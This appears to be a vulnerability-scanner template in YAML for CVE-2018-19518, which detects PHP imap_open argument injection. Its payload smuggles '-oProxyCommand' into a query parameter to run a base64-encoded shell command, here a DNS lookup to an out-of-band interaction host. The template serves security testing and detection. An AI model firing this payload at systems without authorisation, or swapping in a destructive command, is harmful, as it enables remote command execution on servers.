42 lines
1.7 KiB
YAML
42 lines
1.7 KiB
YAML
|
id: CVE-2018-19518
|
||
|
|
||
|
info:
|
||
|
name: PHP imap - Remote Command Execution
|
||
|
author: princechaddha
|
||
|
severity: high
|
||
|
description: |
|
||
|
University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument.
|
||
|
reference:
|
||
|
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-19518
|
||
|
- https://www.openwall.com/lists/oss-security/2018/11/22/3
|
||
|
- https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2018-19518
|
||
|
cwe-id: CWE-88
|
||
|
metadata:
|
||
|
confidence: tenative
|
||
|
tags: imap,dast,vulhub,cve,cve2018,rce,oast,php,fuzz
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}"
|
||
|
|
||
|
payloads:
|
||
|
php-imap:
|
||
|
- "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}"
|
||
|
|
||
|
fuzzing:
|
||
|
- part: query
|
||
|
fuzz:
|
||
|
- "{{php-imap}}"
|
||
|
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||
|
words:
|
||
|
- "dns"
|